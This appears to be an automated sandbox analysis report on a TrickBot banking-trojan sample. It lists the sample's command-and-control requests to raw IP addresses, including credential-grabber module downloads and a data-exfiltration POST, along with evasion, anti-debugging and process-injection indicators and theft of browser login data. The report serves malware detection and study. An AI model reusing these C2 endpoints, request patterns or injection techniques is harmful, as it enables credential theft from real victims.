Source: History.bak.13.dr String found in binary or memory: https://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=
Source: History.bak.13.dr String found in binary or memory: https://www.alldrivers4devices.net/blogstat/click.php?f=bios320_exe64bit.rar%3E%3Cspan%20style=Drive
Source: History.bak.13.dr String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: History.bak.13.dr String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: History.bak.13.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
Source: History.bak.13.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
Source: History.bak.13.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: Web Data.bak.13.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=adobe
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=at
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=autoit
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=bios320.exe
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=firefox
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=java
Source: History.bak.13.dr String found in binary or memory: https://www.google.com/search?q=testzentrum
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releaseDownload
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: History.bak.13.dr String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/Download
Source: History.bak.13.dr String found in binary or memory: https://www.office.com/setup
Source: History.bak.13.dr String found in binary or memory: https://www.office.com/setupMicrosoft
Source: unknown HTTP traffic detected: POST /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/64/pwgrabb/VERS// HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=------Boundary00F7D7B1User-Agent: curl/7.77.0Content-Length: 141Host: 46.99.175.217
Source: unknown DNS traffic detected: queries for: ip.anysrc.net
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/file/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/0/Windows%2010%20x64/1108/102.129.143.91/6760749C3E0F3C8028653796E6C431FC062A0AA0107C34B734353BDE5C7824FB/K4eaS6gi8qoueakyUIyY/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/user/user/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5CGNU-Rach-559H%5CdngqoAXyDd.exe/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/23/100019/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/DNSBL/listed/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9
Source: global traffic HTTP traffic detected: GET /cookiechecker?uri=/top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
Source: global traffic HTTP traffic detected: GET /index.html HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
Source: global traffic HTTP traffic detected: GET /login.cgi?uri=/index.html HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 24.45.255.9Cookie: AIROS_6872516E0657=ddb722f4fb72773a791e116cf4cb38b0
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabb64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 202.58.199.82
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/dpost/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/10/62/LDBHBJFHFNV/1/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 46.99.175.217
Source: global traffic HTTP traffic detected: GET /top147/061544_W10019042.34ED337BB336C4191A537F33B775D9BB/5/pwgrabc64/ HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: 202.58.199.82
Source: global traffic HTTP traffic detected: GET /plain HTTP/1.1Connection: Keep-AliveUser-Agent: curl/7.77.0Host: ip.anysrc.net
Source: unknown HTTPS traffic detected: 46.99.175.217:443 -> 192.168.11.20:49778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 24.45.255.9:443 -> 192.168.11.20:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 202.58.199.82:443 -> 192.168.11.20:49800 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 5016, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.9279032092.0000000002881000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Found detection on Joe Sandbox Cloud Basic with higher score
Source: dngqoAXyDd.exe Joe Sandbox Cloud Basic: Detection: malicious Score: 80 Threat Name: TrickBot Perma Link
Uses 32bit PE files
Source: dngqoAXyDd.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0075911C 1_2_0075911C
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074C201 1_2_0074C201
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_007582BD 1_2_007582BD
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0075941B 1_2_0075941B
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074C5D3 1_2_0074C5D3
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_007516DE 1_2_007516DE
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0075880E 1_2_0075880E
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0073C950 1_2_0073C950
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074B9CE 1_2_0074B9CE
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074C9BB 1_2_0074C9BB
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0075BBF1 1_2_0075BBF1
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00745C19 1_2_00745C19
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00757D6E 1_2_00757D6E
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00754D22 1_2_00754D22
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00759E7F 1_2_00759E7F
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074BE63 1_2_0074BE63
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00758EA1 1_2_00758EA1
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_02883168 1_2_02883168
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB14D0 3_2_000001767ECB14D0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC88E0 3_2_000001767ECC88E0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC1EA0 3_2_000001767ECC1EA0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC4260 3_2_000001767ECC4260
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB7340 3_2_000001767ECB7340
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBC750 3_2_000001767ECBC750
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB8370 3_2_000001767ECB8370
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB2F30 3_2_000001767ECB2F30
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD52C0 3_2_000001767ECD52C0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB30AA 3_2_000001767ECB30AA
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC51A0 3_2_000001767ECC51A0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCED70 3_2_000001767ECCED70
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCB920 3_2_000001767ECCB920
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD4CF0 3_2_000001767ECD4CF0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC9A80 3_2_000001767ECC9A80
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBFE8E 3_2_000001767ECBFE8E
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC0A00 3_2_000001767ECC0A00
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB79D0 3_2_000001767ECB79D0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC35D0 3_2_000001767ECC35D0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD45D0 3_2_000001767ECD45D0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC73A0 3_2_000001767ECC73A0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB3BB0 3_2_000001767ECB3BB0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC7760 3_2_000001767ECC7760
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD5F60 3_2_000001767ECD5F60
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBF700 3_2_000001767ECBF700
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD4B10 3_2_000001767ECD4B10
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB4730 3_2_000001767ECB4730
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC5AC0 3_2_000001767ECC5AC0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC7EE0 3_2_000001767ECC7EE0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCE47D 3_2_000001767ECCE47D
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC740C 3_2_000001767ECC740C
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECB1030 3_2_000001767ECB1030
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD33D0 3_2_000001767ECD33D0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC17F0 3_2_000001767ECC17F0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCE3F0 3_2_000001767ECCE3F0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: String function: 007443E0 appears 58 times
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: String function: 007475F5 appears 33 times
Contains functionality to call native functions
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCC550 NtDelayExecution, 3_2_000001767ECCC550
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC9CD0 NtQueryInformationProcess, 3_2_000001767ECC9CD0
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBC750 NtQuerySystemInformation,DuplicateHandle,FindCloseChangeNotification,RtlDeleteBoundaryDescriptor, 3_2_000001767ECBC750
Sample file is different than original file name gathered from version info
Source: dngqoAXyDd.exe, 00000001.00000000.9203744354.00000000007C0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe
Source: dngqoAXyDd.exe Binary or memory string: OriginalFilenamecorrect.dll( vs dngqoAXyDd.exe
PE file contains strange resources
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dngqoAXyDd.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: edgegdi.dll Jump to behavior
Source: dngqoAXyDd.exe Virustotal: Detection: 27%
Source: dngqoAXyDd.exe ReversingLabs: Detection: 28%
Source: dngqoAXyDd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\dngqoAXyDd.exe "C:\Users\user\Desktop\dngqoAXyDd.exe"
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\GNU-Rach-559H\cmdrun.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe Jump to behavior
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
Source: C:\Windows\System32\wermgr.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe Jump to behavior
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECBF3C0 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification, 3_2_000001767ECBF3C0
Source: C:\Windows\System32\wermgr.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/5@4/4
Source: C:\Windows\System32\wermgr.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8652:304:WilStaging_02
Source: C:\Windows\System32\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{73479EF1-E3D1-FEE2-97E2-B681E81CDF69}
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00731E80 GetDC,KiUserCallbackDispatcher,GetSystemMetrics,FindResourceA,FindResourceA,FindResourceA,FindResourceA,FindResourceA,VirtualAlloc,SizeofResource,LoadResource,SHGetFolderPathA, 1_2_00731E80
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\GNU-Rach-559H\cmdrun.bat"
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: dngqoAXyDd.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: dngqoAXyDd.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\sample exe lego\correctmodel.pdb source: dngqoAXyDd.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0073D0DF push ecx; ret 1_2_0073D0F2
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00740093 pushad ; ret 1_2_00740094
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_00744425 push ecx; ret 1_2_00744438
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074CEE1 push 510074C7h; retf 1_2_0074CEEF
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_028A0390 push dword ptr [edx+14h]; ret 1_2_028A049D
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD6DD0 pushad ; retf 3_2_000001767ECD6DD1
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCDF22 push esp; iretd 3_2_000001767ECCDF25
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074DD3C DecodePointer,LoadLibraryW,GetProcAddress,GetLastError,GetLastError,GetLastError,EncodePointer,InterlockedExchange,FreeLibrary, 1_2_0074DD3C
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Windows\System32\wermgr.exe Function Chain: threadCreated,threadDelayed,threadDelayed,userTimerSet,threadDelayed,threadDelayed,fileVolumeQueried,languageOrLocalQueried,languageOrLocalQueried,adjustToken,systemQueried,systemQueried,threadDelayed,mutantCreated,threadInformationSet,threadInformationSet,threadInformationSet,threadInformationSet,threadDelayed,threadDelayed,systemQueried,systemQueried,fileOpened,fileOpened,fileOtherOp
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\dngqoAXyDd.exe TID: 8996 Thread sleep count: 140 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\wermgr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCADA0 rdtsc 3_2_000001767ECCADA0
Contains functionality to query network adapater information
Source: C:\Windows\System32\wermgr.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 3_2_000001767ECCFA20
Source: C:\Windows\System32\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECD0960 FindFirstFileW,FindNextFileW, 3_2_000001767ECD0960
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECC7120 FindFirstFileW,FindNextFileW, 3_2_000001767ECC7120
Source: wermgr.exe, 00000003.00000002.14257536634.000001767EDC0000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0
Source: wermgr.exe, 00000003.00000002.14258140953.000001767EE18000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074293C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0074293C
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074DD3C DecodePointer,LoadLibraryW,GetProcAddress,GetLastError,GetLastError,GetLastError,EncodePointer,InterlockedExchange,FreeLibrary, 1_2_0074DD3C
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCADA0 rdtsc 3_2_000001767ECCADA0
Enables debug privileges
Source: C:\Windows\System32\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\System32\wermgr.exe Code function: 3_2_000001767ECCA280 LdrLoadDll, 3_2_000001767ECCA280
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074676A SetUnhandledExceptionFilter, 1_2_0074676A
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0074293C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0074293C
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Code function: 1_2_0073CFF8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0073CFF8

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: C:\Windows\System32\wermgr.exe base: 1767ECB0000 Jump to behavior
Source: C:\Users\user\Desktop\dngqoAXyDd.exe Memory written: C:\Windows\System32\wermgr.exe base: 7FF756886500 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFB0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF67BDD4E80 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 199302D0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 199302D0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FFC0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 199302D0000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
Source: C:\Windows\System32\wermgr.exe Memory written: C:\Windows\System32\svchost.exe base: 1992FF50000 Jump to behavior
